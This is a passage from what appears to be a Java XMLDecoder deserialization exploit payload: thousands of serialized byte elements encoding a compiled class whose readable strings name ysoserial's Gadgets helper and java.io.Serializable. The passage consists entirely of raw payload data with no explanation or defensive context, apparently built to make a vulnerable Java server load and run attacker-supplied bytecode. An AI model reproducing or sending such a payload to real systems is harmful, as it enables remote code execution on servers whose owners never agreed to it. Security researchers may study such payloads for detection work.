index="3615"><byte>0</byte></void><void index="3616"><byte>0</byte></void><void index="3617"><byte>0</byte></void><void index="3618"><byte>4</byte></void><void index="3619"><byte>0</byte></void><void index="3620"><byte>1</byte></void><void index="3621"><byte>0</byte></void><void index="3622"><byte>26</byte></void><void index="3623"><byte>0</byte></void><void index="3624"><byte>1</byte></void><void index="3625"><byte>0</byte></void><void index="3626"><byte>19</byte></void><void index="3627"><byte>0</byte></void><void index="3628"><byte>27</byte></void><void index="3629"><byte>0</byte></void><void index="3630"><byte>2</byte></void><void index="3631"><byte>0</byte></void><void index="3632"><byte>12</byte></void><void index="3633"><byte>0</byte></void><void index="3634"><byte>0</byte></void><void index="3635"><byte>0</byte></void><void index="3636"><byte>73</byte></void><void index="3637"><byte>0</byte></void><void index="3638"><byte>0</byte></void><void index="3639"><byte>0</byte></void><void index="3640"><byte>4</byte></void><void index="3641"><byte>0</byte></void><void index="3642"><byte>0</byte></void><void index="3643"><byte>0</byte></void><void index="3644"><byte>1</byte></void><void index="3645"><byte>-79</byte></void><void index="3646"><byte>0</byte></void><void index="3647"><byte>0</byte></void><void index="3648"><byte>0</byte></void><void index="3649"><byte>2</byte></void><void index="3650"><byte>0</byte></void><void index="3651"><byte>13</byte></void><void index="3652"><byte>0</byte></void><void index="3653"><byte>0</byte></void><void index="3654"><byte>0</byte></void><void index="3655"><byte>6</byte></void><void index="3656"><byte>0</byte></void><void index="3657"><byte>1</byte></void><void index="3658"><byte>0</byte></void><void index="3659"><byte>0</byte></void><void index="3660"><byte>0</byte></void><void index="3661"><byte>56</byte></void><void index="3662"><byte>0</byte></void><void index="3663"><byte>14</byte></void><void index="3664"><byte>0</byte></void><void index="3665"><byte>0</byte></void><void index="3666"><byte>0</byte></void><void index="3667"><byte>42</byte></void><void index="3668"><byte>0</byte></void><void index="3669"><byte>4</byte></void><void index="3670"><byte>0</byte></void><void index="3671"><byte>0</byte></void><void index="3672"><byte>0</byte></void><void index="3673"><byte>1</byte></void><void index="3674"><byte>0</byte></void><void index="3675"><byte>15</byte></void><void index="3676"><byte>0</byte></void><void index="3677"><byte>-71</byte></void><void index="3678"><byte>0</byte></void><void index="3679"><byte>0</byte></void><void index="3680"><byte>0</byte></void><void index="3681"><byte>0</byte></void><void index="3682"><byte>0</byte></void><void index="3683"><byte>1</byte></void><void index="3684"><byte>0</byte></void><void index="3685"><byte>21</byte></void><void index="3686"><byte>0</byte></void><void index="3687"><byte>22</byte></void><void index="3688"><byte>0</byte></void><void index="3689"><byte>1</byte></void><void index="3690"><byte>0</byte></void><void index="3691"><byte>0</byte></void><void index="3692"><byte>0</byte></void><void index="3693"><byte>1</byte></void><void index="3694"><byte>0</byte></void><void index="3695"><byte>28</byte></void><void index="3696"><byte>0</byte></void><void index="3697"><byte>29</byte></void><void index="3698"><byte>0</byte></void><void index="3699"><byte>2</byte></void><void index="3700"><byte>0</byte></void><void index="3701"><byte>0</byte></void><void index="3702"><byte>0</byte></void><void index="3703"><byte>1</byte></void><void index="3704"><byte>0</byte></void><void index="3705"><byte>30</byte></void><void index="3706"><byte>0</byte></void><void index="3707"><byte>31</byte></void><void index="3708"><byte>0</byte></void><void index="3709"><byte>3</byte></void><void index="3710"><byte>0</byte></void><void index="3711"><byte>25</byte></void><void index="3712"><byte>0</byte></void><void index="3713"><byte>0</byte></void><void index="3714"><byte>0</byte></void><void index="3715"><byte>4</byte></void><void index="3716"><byte>0</byte></void><void index="3717"><byte>1</byte></void><void index="3718"><byte>0</byte></void><void index="3719"><byte>26</byte></void><void index="3720"><byte>0</byte></void><void index="3721"><byte>8</byte></void><void index="3722"><byte>0</byte></void><void index="3723"><byte>41</byte></void><void index="3724"><byte>0</byte></void><void index="3725"><byte>11</byte></void><void index="3726"><byte>0</byte></void><void index="3727"><byte>1</byte></void><void index="3728"><byte>0</byte></void><void index="3729"><byte>12</byte></void><void index="3730"><byte>0</byte></void><void index="3731"><byte>0</byte></void><void index="3732"><byte>1</byte></void><void index="3733"><byte>114</byte></void><void index="3734"><byte>0</byte></void><void index="3735"><byte>7</byte></void><void index="3736"><byte>0</byte></void><void index="3737"><byte>11</byte></void><void index="3738"><byte>0</byte></void><void index="3739"><byte>0</byte></void><void index="3740"><byte>1</byte></void><void index="3741"><byte>18</byte></void><void index="3742"><byte>-89</byte></void><void index="3743"><byte>0</byte></void><void index="3744"><byte>3</byte></void><void index="3745"><byte>1</byte></void><void index="3746"><byte>76</byte></void><void index="3747"><byte>-72</byte></void><void index="3748"><byte>0</byte></void><void index="3749"><byte>47</byte></void><void index="3750"><byte>-64</byte></void><void index="3751"><byte>0</byte></void><void index="3752"><byte>49</byte></void><void index="3753"><byte>-74</byte></void><void index="3754"><byte>0</byte></void><void index="3755"><byte>53</byte></void><void index="3756"><byte>-64</byte></void><void index="3757"><byte>0</byte></void><void index="3758"><byte>55</byte></void><void index="3759"><byte>18</byte></void><void index="3760"><byte>57</byte></void><void index="3761"><byte>-74</byte></void><void index="3762"><byte>0</byte></void><void index="3763"><byte>61</byte></void><void index="3764"><byte>77</byte></void><void index="3765"><byte>-72</byte></void><void index="3766"><byte>0</byte></void><void index="3767"><byte>47</byte></void><void index="3768"><byte>-64</byte></void><void index="3769"><byte>0</byte></void><void index="3770"><byte>49</byte></void><void index="3771"><byte>-74</byte></void><void index="3772"><byte>0</byte></void><void index="3773"><byte>53</byte></void><void index="3774"><byte>-64</byte></void><void index="3775"><byte>0</byte></void><void index="3776"><byte>55</byte></void><void index="3777"><byte>-74</byte></void><void index="3778"><byte>0</byte></void><void index="3779"><byte>65</byte></void><void index="3780"><byte>78</byte></void><void index="3781"><byte>45</byte></void><void index="3782"><byte>18</byte></void><void index="3783"><byte>67</byte></void><void index="3784"><byte>-74</byte></void><void index="3785"><byte>0</byte></void><void index="3786"><byte>73</byte></void><void index="3787"><byte>45</byte></void><void index="3788"><byte>-74</byte></void><void index="3789"><byte>0</byte></void><void index="3790"><byte>77</byte></void><void index="3791"><byte>58</byte></void><void index="3792"><byte>4</byte></void><void index="3793"><byte>25</byte></void><void index="3794"><byte>4</byte></void><void index="3795"><byte>-69</byte></void><void index="3796"><byte>0</byte></void><void index="3797"><byte>79</byte></void><void index="3798"><byte>89</byte></void><void index="3799"><byte>-69</byte></void><void index="3800"><byte>0</byte></void><void index="3801"><byte>81</byte></void><void index="3802"><byte>89</byte></void><void index="3803"><byte>-73</byte></void><void index="3804"><byte>0</byte></void><void index="3805"><byte>82</byte></void><void index="3806"><byte>44</byte></void><void index="3807"><byte>-74</byte></void><void index="3808"><byte>0</byte></void><void index="3809"><byte>86</byte></void><void index="3810"><byte>18</byte></void><void index="3811"><byte>88</byte></void><void index="3812"><byte>-74</byte></void><void index="3813"><byte>0</byte></void><void index="3814"><byte>86</byte></void><void index="3815"><byte>-74</byte></void><void index="3816"><byte>0</byte></void><void index="3817"><byte>92</byte></void><void index="3818"><byte>-73</byte></void><void index="3819"><byte>0</byte></void><void index="3820"><byte>94</byte></void><void index="3821"><byte>-74</byte></void><void index="3822"><byte>0</byte></void><void index="3823"><byte>100</byte></void><void index="3824"><byte>25</byte></void><void index="3825"><byte>4</byte></void><void index="3826"><byte>-74</byte></void><void index="3827"><byte>0</byte></void><void index="3828"><byte>103</byte></void><void index="3829"><byte>18</byte></void><void index="3830"><byte>105</byte></void><void index="3831"><byte>-72</byte></void><void index="3832"><byte>0</byte></void><void index="3833"><byte>110</byte></void><void index="3834"><byte>58</byte></void><void index="3835"><byte>5</byte></void><void index="3836"><byte>25</byte></void><void index="3837"><byte>5</byte></void><void index="3838"><byte>1</byte></void><void index="3839"><byte>-91</byte></void><void index="3840"><byte>0</byte></void><void index="3841"><byte>16</byte></void><void index="3842"><byte>25</byte></void><void index="3843"><byte>5</byte></void><void index="3844"><byte>-74</byte></void><void index="3845"><byte>0</byte></void><void index="3846"><byte>115</byte></void><void index="3847"><byte>18</byte></void><void index="3848"><byte>117</byte></void><void index="3849"><byte>-74</byte></void><void index="3850"><byte>0</byte></void><void index="3851"><byte>121</byte></void><void index="3852"><byte>-102</byte></void><void index="3853"><byte>0</byte></void><void index="3854"><byte>6</byte></void><void index="3855"><byte>-89</byte></void><void index="3856"><byte>0</byte></void><void index="3857"><byte>33</byte></void><void index="3858"><byte>-72</byte></void><void index="3859"><byte>0</byte></void><void index="3860"><byte>127</byte></void><void index="3861"><byte>-69</byte></void><void index="3862"><byte>0</byte></void><void index="3863"><byte>81</byte></void><void index="3864"><byte>89</byte></void><void index="3865"><byte>-73</byte></void><void index="3866"><byte>0</byte></void><void index="3867"><byte>82</byte></void><void index="3868"><byte>18</byte></void><void index="3869"><byte>-127</byte></void><void index="3870"><byte>-74</byte></void><void index="3871"><byte>0</byte></void><void index="3872"><byte>86</byte></void><void index="3873"><byte>44</byte></void><void index="3874"><byte>-74</byte></void><void index="3875"><byte>0</byte></void><void index="3876"><byte>86</byte></void><void index="3877"><byte>-74</byte></void><void index="3878"><byte>0</byte></void><void index="3879"><byte>92</byte></void><void index="3880"><byte>-74</byte></void><void index="3881"><byte>0</byte></void><void index="3882"><byte>-123</byte></void><void index="3883"><byte>58</byte></void><void index="3884"><byte>6</byte></void><void index="3885"><byte>-89</byte></void><void index="3886"><byte>0</byte></void><void index="3887"><byte>30</byte></void><void index="3888"><byte>-72</byte></void><void index="3889"><byte>0</byte></void><void index="3890"><byte>127</byte></void><void index="3891"><byte>-69</byte></void><void index="3892"><byte>0</byte></void><void index="3893"><byte>81</byte></void><void index="3894"><byte>89</byte></void><void index="3895"><byte>-73</byte></void><void index="3896"><byte>0</byte></void><void index="3897"><byte>82</byte></void><void index="3898"><byte>18</byte></void><void index="3899"><byte>-121</byte></void><void index="3900"><byte>-74</byte></void><void index="3901"><byte>0</byte></void><void index="3902"><byte>86</byte></void><void index="3903"><byte>44</byte></void><void index="3904"><byte>-74</byte></void><void index="3905"><byte>0</byte></void><void index="3906"><byte>86</byte></void><void index="3907"><byte>-74</byte></void><void index="3908"><byte>0</byte></void><void index="3909"><byte>92</byte></void><void index="3910"><byte>-74</byte></void><void index="3911"><byte>0</byte></void><void index="3912"><byte>-123</byte></void><void index="3913"><byte>58</byte></void><void index="3914"><byte>6</byte></void><void index="3915"><byte>-69</byte></void><void index="3916"><byte>0</byte></void><void index="3917"><byte>-119</byte></void><void index="3918"><byte>89</byte></void><void index="3919"><byte>-69</byte></void><void index="3920"><byte>0</byte></void><void index="3921"><byte>-117</byte></void><void index="3922"><byte>89</byte></void><void index="3923"><byte>25</byte></void><void index="3924"><byte>6</byte></void><void index="3925"><byte>-74</byte></void><void index="3926"><byte>0</byte></void><void index="3927"><byte>-111</byte></void><void index="3928"><byte>18</byte></void><void index="3929"><byte>67</byte></void><void index="3930"><byte>-73</byte></void><void index="3931"><byte>0</byte></void><void index="3932"><byte>-108</byte></void><void index="3933"><byte>-73</byte></void><void index="3934"><byte>0</byte></void><void index="3935"><byte>-105</byte></void><void index="3936"><byte>58</byte></void><void index="3937"><byte>7</byte></void><void index="3938"><byte>1</byte></void><void index="3939"><byte>58</byte></void><void index="3940"><byte>8</byte></void><void index="3941"><byte>18</byte></void><void index="3942"><byte>-103</byte></void><void index="3943"><byte>58</byte></void><void index="3944"><byte>9</byte></void><void index="3945"><byte>-89</byte></void><void index="3946"><byte>0</byte></void><void index="3947"><byte>25</byte></void><void index="3948"><byte>-69</byte></void><void index="3949"><byte>0</byte></void><void index="3950"><byte>81</byte></void><void index="3951"><byte>89</byte></void><void index="3952"><byte>-73</byte></void><void index="3953"><byte>0</byte></void><void index="3954"><byte>82</byte></void><void index="3955"><byte>25</byte></void><void index="3956"><byte>9</byte></void><void index="3957"><byte>-74</byte></void><void index="3958"><byte>0</byte></void><void index="3959"><byte>86</byte></void><void index="3960"><byte>25</byte></void><void index="3961"><byte>8</byte></void><void index="3962"><byte>-74</byte></void><void index="3963"><byte>0</byte></void><void index="3964"><byte>86</byte></void><void index="3965"><byte>-74</byte></void><void index="3966"><byte>0</byte></void><void index="3967"><byte>92</byte></void><void index="3968"><byte>58</byte></void><void index="3969"><byte>9</byte></void><void index="3970"><byte>25</byte></void><void index="3971"><byte>7</byte></void><void index="3972"><byte>-74</byte></void><void index="3973"><byte>0</byte></void><void index="3974"><byte>-100</byte></void><void index="3975"><byte>89</byte></void><void index="3976"><byte>58</byte></void><void index="3977"><byte>8</byte></void><void index="3978"><byte>1</byte></void><void index="3979"><byte>-90</byte></void><void index="3980"><byte>-1</byte></void><void index="3981"><byte>-31</byte></void><void index="3982"><byte>45</byte></void><void index="3983"><byte>-74</byte></void><void index="3984"><byte>0</byte></void><void index="3985"><byte>-96</byte></void><void index="3986"><byte>25</byte></void><void index="3987"><byte>9</byte></void><void index="3988"><byte>-74</byte></void><void index="3989"><byte>0</byte></void><void index="3990"><byte>-91</byte></void><void index="3991"><byte>-89</byte></void><void index="3992"><byte>0</byte></void><void index="3993"><byte>24</byte></void><void index="3994"><byte>58</byte></void><void index="3995"><byte>10</byte></void><void index="3996"><byte>-78</byte></void><void index="3997"><byte>0</byte></void><void index="3998"><byte>-85</byte></void><void index="3999"><byte>25</byte></void><void index="4000"><byte>10</byte></void><void index="4001"><byte>-74</byte></void><void index="4002"><byte>0</byte></void><void index="4003"><byte>-82</byte></void><void index="4004"><byte>-74</byte></void><void index="4005"><byte>0</byte></void><void index="4006"><byte>-77</byte></void><void index="4007"><byte>25</byte></void><void index="4008"><byte>10</byte></void><void index="4009"><byte>-74</byte></void><void index="4010"><byte>0</byte></void><void index="4011"><byte>-74</byte></void><void index="4012"><byte>-89</byte></void><void index="4013"><byte>0</byte></void><void index="4014"><byte>3</byte></void><void index="4015"><byte>-79</byte></void><void index="4016"><byte>0</byte></void><void index="4017"><byte>1</byte></void><void index="4018"><byte>0</byte></void><void index="4019"><byte>94</byte></void><void index="4020"><byte>0</byte></void><void index="4021"><byte>-7</byte></void><void index="4022"><byte>0</byte></void><void index="4023"><byte>-4</byte></void><void index="4024"><byte>0</byte></void><void index="4025"><byte>-89</byte></void><void index="4026"><byte>0</byte></void><void index="4027"><byte>1</byte></void><void index="4028"><byte>0</byte></void><void index="4029"><byte>-73</byte></void><void index="4030"><byte>0</byte></void><void index="4031"><byte>0</byte></void><void index="4032"><byte>0</byte></void><void index="4033"><byte>70</byte></void><void index="4034"><byte>0</byte></void><void index="4035"><byte>9</byte></void><void index="4036"><byte>3</byte></void><void index="4037"><byte>-1</byte></void><void index="4038"><byte>0</byte></void><void index="4039"><byte>109</byte></void><void index="4040"><byte>0</byte></void><void index="4041"><byte>6</byte></void><void index="4042"><byte>0</byte></void><void index="4043"><byte>5</byte></void><void index="4044"><byte>7</byte></void><void index="4045"><byte>0</byte></void><void index="4046"><byte>112</byte></void><void index="4047"><byte>7</byte></void><void index="4048"><byte>0</byte></void><void index="4049"><byte>69</byte></void><void index="4050"><byte>7</byte></void><void index="4051"><byte>0</byte></void><void index="4052"><byte>96</byte></void><void index="4053"><byte>7</byte></void><void index="4054"><byte>0</byte></void><void index="4055"><byte>112</byte></void><void index="4056"><byte>0</byte></void><void index="4057"><byte>0</byte></void><void index="4058"><byte>2</byte></void><void index="4059"><byte>29</byte></void><void index="4060"><byte>-4</byte></void><void index="4061"><byte>0</byte></void><void index="4062"><byte>26</byte></void><void index="4063"><byte>7</byte></void><void index="4064"><byte>0</byte></void><void index="4065"><byte>-115</byte></void><void index="4066"><byte>-2</byte></void><void index="4067"><byte>0</byte></void><void index="4068"><byte>32</byte></void><void index="4069"><byte>7</byte></void><void index="4070"><byte>0</byte></void><void index="4071"><byte>-119</byte></void><void index="4072"><byte>7</byte></void><void index="4073"><byte>0</byte></void><void index="4074"><byte>112</byte></void><void index="4075"><byte>7</byte></void><void index="4076"><byte>0</byte></void><void index="4077"><byte>112</byte></void><void index="4078"><byte>21</byte></void><void index="4079"><byte>-1</byte></void><void index="4080"><byte>0</byte></void><void index="4081"><byte>23</byte></void><void index="4082"><byte>0</byte></void><void index="4083"><byte>6</byte></void><void index="4084"><byte>0</byte></void><void index="4085"><byte>5</byte></void><void index="4086"><byte>7</byte></void><void index="4087"><byte>0</byte></void><void index="4088"><byte>112</byte></void><void index="4089"><byte>7</byte></void><void index="4090"><byte>0</byte></void><void index="4091"><byte>69</byte></void><void index="4092"><byte>7</byte></void><void index="4093"><byte>0</byte></void><void index="4094"><byte>96</byte></void><void index="4095"><byte>7</byte></void><void index="4096"><byte>0</byte></void><void index="4097"><byte>112</byte></void><void index="4098"><byte>0</byte></void><void index="4099"><byte>1</byte></void><void index="4100"><byte>7</byte></void><void index="4101"><byte>0</byte></void><void index="4102"><byte>-89</byte></void><void index="4103"><byte>20</byte></void><void index="4104"><byte>0</byte></void><void index="4105"><byte>2</byte></void><void index="4106"><byte>0</byte></void><void index="4107"><byte>32</byte></void><void index="4108"><byte>0</byte></void><void index="4109"><byte>0</byte></void><void index="4110"><byte>0</byte></void><void index="4111"><byte>2</byte></void><void index="4112"><byte>0</byte></void><void index="4113"><byte>33</byte></void><void index="4114"><byte>0</byte></void><void index="4115"><byte>17</byte></void><void index="4116"><byte>0</byte></void><void index="4117"><byte>0</byte></void><void index="4118"><byte>0</byte></void><void index="4119"><byte>10</byte></void><void index="4120"><byte>0</byte></void><void index="4121"><byte>1</byte></void><void index="4122"><byte>0</byte></void><void index="4123"><byte>2</byte></void><void index="4124"><byte>0</byte></void><void index="4125"><byte>35</byte></void><void index="4126"><byte>0</byte></void><void index="4127"><byte>16</byte></void><void index="4128"><byte>0</byte></void><void index="4129"><byte>9</byte></void><void index="4130"><byte>117</byte></void><void index="4131"><byte>113</byte></void><void index="4132"><byte>0</byte></void><void index="4133"><byte>126</byte></void><void index="4134"><byte>0</byte></void><void index="4135"><byte>13</byte></void><void index="4136"><byte>0</byte></void><void index="4137"><byte>0</byte></void><void index="4138"><byte>1</byte></void><void index="4139"><byte>-44</byte></void><void index="4140"><byte>-54</byte></void><void index="4141"><byte>-2</byte></void><void index="4142"><byte>-70</byte></void><void index="4143"><byte>-66</byte></void><void index="4144"><byte>0</byte></void><void index="4145"><byte>0</byte></void><void index="4146"><byte>0</byte></void><void index="4147"><byte>50</byte></void><void index="4148"><byte>0</byte></void><void index="4149"><byte>27</byte></void><void index="4150"><byte>10</byte></void><void index="4151"><byte>0</byte></void><void index="4152"><byte>3</byte></void><void index="4153"><byte>0</byte></void><void index="4154"><byte>21</byte></void><void index="4155"><byte>7</byte></void><void index="4156"><byte>0</byte></void><void index="4157"><byte>23</byte></void><void index="4158"><byte>7</byte></void><void index="4159"><byte>0</byte></void><void index="4160"><byte>24</byte></void><void index="4161"><byte>7</byte></void><void index="4162"><byte>0</byte></void><void index="4163"><byte>25</byte></void><void index="4164"><byte>1</byte></void><void index="4165"><byte>0</byte></void><void index="4166"><byte>16</byte></void><void index="4167"><byte>115</byte></void><void index="4168"><byte>101</byte></void><void index="4169"><byte>114</byte></void><void index="4170"><byte>105</byte></void><void index="4171"><byte>97</byte></void><void index="4172"><byte>108</byte></void><void index="4173"><byte>86</byte></void><void index="4174"><byte>101</byte></void><void index="4175"><byte>114</byte></void><void index="4176"><byte>115</byte></void><void index="4177"><byte>105</byte></void><void index="4178"><byte>111</byte></void><void index="4179"><byte>110</byte></void><void index="4180"><byte>85</byte></void><void index="4181"><byte>73</byte></void><void index="4182"><byte>68</byte></void><void index="4183"><byte>1</byte></void><void index="4184"><byte>0</byte></void><void index="4185"><byte>1</byte></void><void index="4186"><byte>74</byte></void><void index="4187"><byte>1</byte></void><void index="4188"><byte>0</byte></void><void index="4189"><byte>13</byte></void><void index="4190"><byte>67</byte></void><void index="4191"><byte>111</byte></void><void index="4192"><byte>110</byte></void><void index="4193"><byte>115</byte></void><void index="4194"><byte>116</byte></void><void index="4195"><byte>97</byte></void><void index="4196"><byte>110</byte></void><void index="4197"><byte>116</byte></void><void index="4198"><byte>86</byte></void><void index="4199"><byte>97</byte></void><void index="4200"><byte>108</byte></void><void index="4201"><byte>117</byte></void><void index="4202"><byte>101</byte></void><void index="4203"><byte>5</byte></void><void index="4204"><byte>113</byte></void><void index="4205"><byte>-26</byte></void><void index="4206"><byte>105</byte></void><void index="4207"><byte>-18</byte></void><void index="4208"><byte>60</byte></void><void index="4209"><byte>109</byte></void><void index="4210"><byte>71</byte></void><void index="4211"><byte>24</byte></void><void index="4212"><byte>1</byte></void><void index="4213"><byte>0</byte></void><void index="4214"><byte>6</byte></void><void index="4215"><byte>60</byte></void><void index="4216"><byte>105</byte></void><void index="4217"><byte>110</byte></void><void index="4218"><byte>105</byte></void><void index="4219"><byte>116</byte></void><void index="4220"><byte>62</byte></void><void index="4221"><byte>1</byte></void><void index="4222"><byte>0</byte></void><void index="4223"><byte>3</byte></void><void index="4224"><byte>40</byte></void><void index="4225"><byte>41</byte></void><void index="4226"><byte>86</byte></void><void index="4227"><byte>1</byte></void><void index="4228"><byte>0</byte></void><void index="4229"><byte>4</byte></void><void index="4230"><byte>67</byte></void><void index="4231"><byte>111</byte></void><void index="4232"><byte>100</byte></void><void index="4233"><byte>101</byte></void><void index="4234"><byte>1</byte></void><void index="4235"><byte>0</byte></void><void index="4236"><byte>15</byte></void><void index="4237"><byte>76</byte></void><void index="4238"><byte>105</byte></void><void index="4239"><byte>110</byte></void><void index="4240"><byte>101</byte></void><void index="4241"><byte>78</byte></void><void index="4242"><byte>117</byte></void><void index="4243"><byte>109</byte></void><void index="4244"><byte>98</byte></void><void index="4245"><byte>101</byte></void><void index="4246"><byte>114</byte></void><void index="4247"><byte>84</byte></void><void index="4248"><byte>97</byte></void><void index="4249"><byte>98</byte></void><void index="4250"><byte>108</byte></void><void index="4251"><byte>101</byte></void><void index="4252"><byte>1</byte></void><void index="4253"><byte>0</byte></void><void index="4254"><byte>18</byte></void><void index="4255"><byte>76</byte></void><void index="4256"><byte>111</byte></void><void index="4257"><byte>99</byte></void><void index="4258"><byte>97</byte></void><void index="4259"><byte>108</byte></void><void index="4260"><byte>86</byte></void><void index="4261"><byte>97</byte></void><void index="4262"><byte>114</byte></void><void index="4263"><byte>105</byte></void><void index="4264"><byte>97</byte></void><void index="4265"><byte>98</byte></void><void index="4266"><byte>108</byte></void><void index="4267"><byte>101</byte></void><void index="4268"><byte>84</byte></void><void index="4269"><byte>97</byte></void><void index="4270"><byte>98</byte></void><void index="4271"><byte>108</byte></void><void index="4272"><byte>101</byte></void><void index="4273"><byte>1</byte></void><void index="4274"><byte>0</byte></void><void index="4275"><byte>4</byte></void><void index="4276"><byte>116</byte></void><void index="4277"><byte>104</byte></void><void index="4278"><byte>105</byte></void><void index="4279"><byte>115</byte></void><void index="4280"><byte>1</byte></void><void index="4281"><byte>0</byte></void><void index="4282"><byte>3</byte></void><void index="4283"><byte>70</byte></void><void index="4284"><byte>111</byte></void><void index="4285"><byte>111</byte></void><void index="4286"><byte>1</byte></void><void index="4287"><byte>0</byte></void><void index="4288"><byte>12</byte></void><void index="4289"><byte>73</byte></void><void index="4290"><byte>110</byte></void><void index="4291"><byte>110</byte></void><void index="4292"><byte>101</byte></void><void index="4293"><byte>114</byte></void><void index="4294"><byte>67</byte></void><void index="4295"><byte>108</byte></void><void index="4296"><byte>97</byte></void><void index="4297"><byte>115</byte></void><void index="4298"><byte>115</byte></void><void index="4299"><byte>101</byte></void><void index="4300"><byte>115</byte></void><void index="4301"><byte>1</byte></void><void index="4302"><byte>0</byte></void><void index="4303"><byte>37</byte></void><void index="4304"><byte>76</byte></void><void index="4305"><byte>121</byte></void><void index="4306"><byte>115</byte></void><void index="4307"><byte>111</byte></void><void index="4308"><byte>115</byte></void><void index="4309"><byte>101</byte></void><void index="4310"><byte>114</byte></void><void index="4311"><byte>105</byte></void><void index="4312"><byte>97</byte></void><void index="4313"><byte>108</byte></void><void index="4314"><byte>47</byte></void><void index="4315"><byte>112</byte></void><void index="4316"><byte>97</byte></void><void index="4317"><byte>121</byte></void><void index="4318"><byte>108</byte></void><void index="4319"><byte>111</byte></void><void index="4320"><byte>97</byte></void><void index="4321"><byte>100</byte></void><void index="4322"><byte>115</byte></void><void index="4323"><byte>47</byte></void><void index="4324"><byte>117</byte></void><void index="4325"><byte>116</byte></void><void index="4326"><byte>105</byte></void><void index="4327"><byte>108</byte></void><void index="4328"><byte>47</byte></void><void index="4329"><byte>71</byte></void><void index="4330"><byte>97</byte></void><void index="4331"><byte>100</byte></void><void index="4332"><byte>103</byte></void><void index="4333"><byte>101</byte></void><void index="4334"><byte>116</byte></void><void index="4335"><byte>115</byte></void><void index="4336"><byte>36</byte></void><void index="4337"><byte>70</byte></void><void index="4338"><byte>111</byte></void><void index="4339"><byte>111</byte></void><void index="4340"><byte>59</byte></void><void index="4341"><byte>1</byte></void><void index="4342"><byte>0</byte></void><void index="4343"><byte>10</byte></void><void index="4344"><byte>83</byte></void><void index="4345"><byte>111</byte></void><void index="4346"><byte>117</byte></void><void index="4347"><byte>114</byte></void><void index="4348"><byte>99</byte></void><void index="4349"><byte>101</byte></void><void index="4350"><byte>70</byte></void><void index="4351"><byte>105</byte></void><void index="4352"><byte>108</byte></void><void index="4353"><byte>101</byte></void><void index="4354"><byte>1</byte></void><void index="4355"><byte>0</byte></void><void index="4356"><byte>12</byte></void><void index="4357"><byte>71</byte></void><void index="4358"><byte>97</byte></void><void index="4359"><byte>100</byte></void><void index="4360"><byte>103</byte></void><void index="4361"><byte>101</byte></void><void index="4362"><byte>116</byte></void><void index="4363"><byte>115</byte></void><void index="4364"><byte>46</byte></void><void index="4365"><byte>106</byte></void><void index="4366"><byte>97</byte></void><void index="4367"><byte>118</byte></void><void index="4368"><byte>97</byte></void><void index="4369"><byte>12</byte></void><void index="4370"><byte>0</byte></void><void index="4371"><byte>10</byte></void><void index="4372"><byte>0</byte></void><void index="4373"><byte>11</byte></void><void index="4374"><byte>7</byte></void><void index="4375"><byte>0</byte></void><void index="4376"><byte>26</byte></void><void index="4377"><byte>1</byte></void><void index="4378"><byte>0</byte></void><void index="4379"><byte>35</byte></void><void index="4380"><byte>121</byte></void><void index="4381"><byte>115</byte></void><void index="4382"><byte>111</byte></void><void index="4383"><byte>115</byte></void><void index="4384"><byte>101</byte></void><void index="4385"><byte>114</byte></void><void index="4386"><byte>105</byte></void><void index="4387"><byte>97</byte></void><void index="4388"><byte>108</byte></void><void index="4389"><byte>47</byte></void><void index="4390"><byte>112</byte></void><void index="4391"><byte>97</byte></void><void index="4392"><byte>121</byte></void><void index="4393"><byte>108</byte></void><void index="4394"><byte>111</byte></void><void index="4395"><byte>97</byte></void><void index="4396"><byte>100</byte></void><void index="4397"><byte>115</byte></void><void index="4398"><byte>47</byte></void><void index="4399"><byte>117</byte></void><void index="4400"><byte>116</byte></void><void index="4401"><byte>105</byte></void><void index="4402"><byte>108</byte></void><void index="4403"><byte>47</byte></void><void index="4404"><byte>71</byte></void><void index="4405"><byte>97</byte></void><void index="4406"><byte>100</byte></void><void index="4407"><byte>103</byte></void><void index="4408"><byte>101</byte></void><void index="4409"><byte>116</byte></void><void index="4410"><byte>115</byte></void><void index="4411"><byte>36</byte></void><void index="4412"><byte>70</byte></void><void index="4413"><byte>111</byte></void><void index="4414"><byte>111</byte></void><void index="4415"><byte>1</byte></void><void index="4416"><byte>0</byte></void><void index="4417"><byte>16</byte></void><void index="4418"><byte>106</byte></void><void index="4419"><byte>97</byte></void><void index="4420"><byte>118</byte></void><void index="4421"><byte>97</byte></void><void index="4422"><byte>47</byte></void><void index="4423"><byte>108</byte></void><void index="4424"><byte>97</byte></void><void index="4425"><byte>110</byte></void><void index="4426"><byte>103</byte></void><void index="4427"><byte>47</byte></void><void index="4428"><byte>79</byte></void><void index="4429"><byte>98</byte></void><void index="4430"><byte>106</byte></void><void index="4431"><byte>101</byte></void><void index="4432"><byte>99</byte></void><void index="4433"><byte>116</byte></void><void index="4434"><byte>1</byte></void><void index="4435"><byte>0</byte></void><void index="4436"><byte>20</byte></void><void index="4437"><byte>106</byte></void><void index="4438"><byte>97</byte></void><void index="4439"><byte>118</byte></void><void index="4440"><byte>97</byte></void><void index="4441"><byte>47</byte></void><void index="4442"><byte>105</byte></void><void index="4443"><byte>111</byte></void><void index="4444"><byte>47</byte></void><void index="4445"><byte>83</byte></void><void index="4446"><byte>101</byte></void><void index="4447"><byte>114</byte></void><void index="4448"><byte>105</byte></void><void index="4449"><byte>97</byte></void><void index="4450"><byte>108</byte></void><void index="4451"><byte>105</byte></void><void index="4452"><byte>122</byte></void><void index="4453"><byte>97</byte></void><void index="4454"><byte>98</byte></void><void index="4455"><byte>108</byte></void><void index="4456"><byte>101</byte></void><void index="4457"><byte>1</byte></void><void index="4458"><byte>0</byte></void><void index="4459"><byte>31</byte></void><void index="4460"><byte>121</byte></void><void index="4461"><byte>115</byte></void><void index="4462"><byte>111</byte></void><void index="4463"><byte>115</byte></void><void index="4464"><byte>101</byte></void><void index="4465"><byte>114</byte></void><void index="4466"><byte>105</byte></void><void index="4467"><byte>97</byte></void><void index="4468"><byte>108</byte></void><void index="4469"><byte>47</byte></void><void index="4470"><byte>112</byte></void><void index="4471"><byte>97</byte></void><void index="4472"><byte>121</byte></void><void index="4473"><byte>108</byte></void><void index="4474"><byte>111</byte></void><void index="4475"><byte>97</byte></void><void index="4476"><byte>100</byte></void><void index="4477"><byte>115</byte></void><void index="4478"><byte>47</byte></void><void index="4479"><byte>117</byte></void><void index="4480"><byte>116</byte></void><void index="4481"><byte>105</byte></void><void index="4482"><byte>108</byte></void><void index="4483"><byte>47</byte></void><void index="4484"><byte>71</byte></void><void index="4485"><byte>97</byte></void><void index="4486"><byte>100</byte></void><void index="4487"><byte>103</byte></void><void index="4488"><byte>101</byte></void><void index="4489"><byte>116</byte></void><void index="4490"><byte>115</byte></void><void 